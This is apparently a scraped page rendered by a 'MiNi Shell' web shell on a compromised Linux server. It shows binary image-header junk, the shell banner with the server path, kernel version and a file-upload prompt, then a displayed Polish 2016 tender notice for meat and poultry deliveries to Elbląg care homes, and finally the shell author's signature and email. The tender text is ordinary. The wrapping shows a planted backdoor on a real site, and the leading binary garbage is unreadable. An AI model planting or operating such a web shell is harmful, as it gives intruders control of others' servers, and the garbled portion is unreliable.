JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160517/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160517/124652-N-2016.html

<p class="kh_header"><b>Elbląg: Dostawa i sprzedaż mięsa i wędlin, drobiu i jego elementów</b><br>
<b>Numer ogłoszenia: 124652 - 2016; data zamieszczenia: 17.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Socjalizacyjna Całodobowa Placówka Opiekuńczo-Wychowawcza w Elblągu , ul. Chrobrego 4, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 625 83 04, 6258310, faks 55 625 83 06.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.domdziecka.elblag.com.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i sprzedaż mięsa i wędlin, drobiu i jego elementów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Zadanie 1 - dostawa i sprzedaż mięsa i wędlin dla Socjalizacyjnej Całodobowej Placówki Opiekuńczo - Wychowawczej w Elblągu ul. Chrobrego 4
Łopatka                     b/k	kg	200
Schab                       b/k	kg	80
Karkówka                 b/k	kg	15
Pachwina świeza    b/s	kg 	25
Wołowina                 b/k	kg	25
Wątroba wieprzowa 	kg 	20
Żeberka          paski 	kg	30
Smalec 	kg 	50
Boczek parzony 	kg 	30
Kiełbasa podwawelska 	kg	50
Kaszanka 	kg	10
Kiełbasa biała surowa cienka 	kg	25
Pasztetowa ze szczypiorkiem	kg 	20
Parówki wieprzowe 	kg	30
Parówki cielęce 	kg	35
Pasztet wieprzowy	kg 	15
Pasztet drobiowy 	kg	15
Pasztet drobiowy      135g	szt.	180
Pieczeń rzymska 	kg	15
Lanchmit 	kg	35
Szynka konserwowa	kg	30
Szynka gotowana 	kg	40
Szynka wędzona 	kg	50
Żywiecka parzona 	kg	15
Krakowska parzona 	kg	15
Polędwica drobiowa 	kg	25
Schab królweski 	kg	10
Polędwica sopocka	kg	30
Polędwica kanadyjska 	kg	10
Filet z indyka parzony	kg 	10
Mortadela 	kg	35
Krakowska sucha 	kg	2

2)	Zadanie 2 - dostawa  i sprzedaż mięsa i wędlin  dla Placówki Opiekuńczo - Wychowawczej Nr 3 w Elblągu ul. Mazurska 6.
Łopatka                        b/k	kg	200
Karkówka                   b/k 	kg	60
Schab                         b/k	kg	60
Wołowina                   b/k	kg 	10
Pachwina                   b/s	kg	10
Słonina                       b/s	kg 	5
Szynka                       b/k	kg	10
Wątroba wieprzowa 	kg	20
Żeberka         paski 	kg	60
Smalec 	kg	25
Boczek parzony 	kg	30
Filecik z indyka parzony 	kg	20
Lanchmit 	kg	20
Hamburger drobiowy    250g	szt.	90
Kabanosy drobiowo- wieprzowe 	kg	15
Kiełbasa biała surowa cienka 	kg	25
Kiełbasa jałowcowa 	kg	5
Krakowska parzona 	kg	20
Mortadela 	kg	30
Szynkowa 	kg	25
Kiełbasa śląska	kg	30
Kiełbasa podwawelska 	kg	50
Żywiecka parzona 	kg	10
Metka łososiowa 	kg	8
Parówki wieprzowe 	kg	50
Pasztet wieprzowy	kg	20
Pasztetowa drobiowa	kg	25
Pasztetowa wędzona 	kg	25
Polędwica drobiowa 	kg	10
Polędwica kanadyjska	kg	10
Polędwica sopocka	kg	15
Szynka wędzona	kg	30
Szynka konserwowa	kg	20
Schab pieczony 	kg 	10

3)	Zadanie 3 - dostawa  i sprzedaż drobiu i jego elementów dla Placówki Opiekuńczo - Wychowawczej Nr 3 w Elblągu ul. Mazurska 6.
Filet z kurczaka 	kg	50
Żołądki drobiowe 	kg	10
Korpus 	kg	270
Udko z kurczaka  - ćwiartka 	kg	100
Filet z indyka 	kg	40
Wątroba drobiowa	kg	10.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 10.12.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80.00</li>
<li>2 - termin płatności - 10.00</li>
<li>3 - w - 10.00</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.domdziecka.elblag.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Socjalizacyjna Całodobowa Placówek Opiekuńczo - Wychowawcza w Elblągu
ul. Chrobrego 4
82-300 Elbląg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.05.2016 godzina 10:30, miejsce: Socjalizacyjna Całodobowa Placówek Opiekuńczo - Wychowawcza w Elblągu
ul. Chrobrego 4
82-300 Elbląg.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1)	Zadanie 1 - dostawa i sprzedaż mięsa i wędlin dla Socjalizacyjnej Całodobowej Placówki Opiekuńczo - Wychowawczej w Elblągu ul. Chrobrego 4..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łopatka                     b/k	kg	200
Schab                       b/k	kg	80
Karkówka                 b/k	kg	15
Pachwina świeza    b/s	kg 	25
Wołowina                 b/k	kg	25
Wątroba wieprzowa 	kg 	20
Żeberka          paski 	kg	30
Smalec 	kg 	50
Boczek parzony 	kg 	30
Kiełbasa podwawelska 	kg	50
Kaszanka 	kg	10
Kiełbasa biała surowa cienka 	kg	25
Pasztetowa ze szczypiorkiem	kg 	20
Parówki wieprzowe 	kg	30
Parówki cielęce 	kg	35
Pasztet wieprzowy	kg 	15
Pasztet drobiowy 	kg	15
Pasztet drobiowy      135g	szt.	180
Pieczeń rzymska 	kg	15
Lanchmit 	kg	35
Szynka konserwowa	kg	30
Szynka gotowana 	kg	40
Szynka wędzona 	kg	50
Żywiecka parzona 	kg	15
Krakowska parzona 	kg	15
Polędwica drobiowa 	kg	25
Schab królweski 	kg	10
Polędwica sopocka	kg	30
Polędwica kanadyjska 	kg	10
Filet z indyka parzony	kg 	10
Mortadela 	kg	35
Krakowska sucha 	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. termin płatności - 10.00</li>
<li>3. warunki płatności - 10.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2)	Zadanie 2 - dostawa  i sprzedaż mięsa i wędlin  dla Placówki Opiekuńczo - Wychowawczej Nr 3 w Elblągu ul. Mazurska 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łopatka                        b/k	kg	200
Karkówka                   b/k 	kg	60
Schab                         b/k	kg	60
Wołowina                   b/k	kg 	10
Pachwina                   b/s	kg	10
Słonina                       b/s	kg 	5
Szynka                       b/k	kg	10
Wątroba wieprzowa 	kg	20
Żeberka         paski 	kg	60
Smalec 	kg	25
Boczek parzony 	kg	30
Filecik z indyka parzony 	kg	20
Lanchmit 	kg	20
Hamburger drobiowy    250g	szt.	90
Kabanosy drobiowo- wieprzowe 	kg	15
Kiełbasa biała surowa cienka 	kg	25
Kiełbasa jałowcowa 	kg	5
Krakowska parzona 	kg	20
Mortadela 	kg	30
Szynkowa 	kg	25
Kiełbasa śląska	kg	30
Kiełbasa podwawelska 	kg	50
Żywiecka parzona 	kg	10
Metka łososiowa 	kg	8
Parówki wieprzowe 	kg	50
Pasztet wieprzowy	kg	20
Pasztetowa drobiowa	kg	25
Pasztetowa wędzona 	kg	25
Polędwica drobiowa 	kg	10
Polędwica kanadyjska	kg	10
Polędwica sopocka	kg	15
Szynka wędzona	kg	30
Szynka konserwowa	kg	20
Schab pieczony 	kg 	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. warunki płatności - 10.00</li>
<li>3. termin płatności - 10.00</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 3)	Zadanie 3 - dostawa  i sprzedaż drobiu i jego elementów dla Placówki Opiekuńczo - Wychowawczej Nr 3 w Elblągu ul. Mazurska 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z kurczaka 	kg	50
Żołądki drobiowe 	kg	10
Korpus 	kg	270
Udko z kurczaka  - ćwiartka 	kg	100
Filet z indyka 	kg	40
Wątroba drobiowa	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 10.12.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80.00</li>
<li>2. warunki płatności - 10.00</li>
<li>3. termin płatności - 10.00</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com